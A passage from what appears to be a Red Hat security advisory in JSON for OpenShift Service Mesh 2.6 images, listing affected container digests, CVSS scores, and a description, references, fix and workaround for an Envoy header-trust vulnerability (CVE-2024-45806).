"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"acknowledgments": [
{
"names": [
"Mike Whale"
]
},
{
"names": [
"James Force"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2024-45806",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2024-09-20T00:40:20.976812+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313683"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy\u0027s default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Potential to manipulate `x-envoy` headers from external sources",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat\u0027s CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45806"
},
{
"category": "external",
"summary": "RHBZ#2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45806",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45806"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf"
}
],
"release_date": "2024-09-20T00:15:02.293000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.",
"product_ids": [
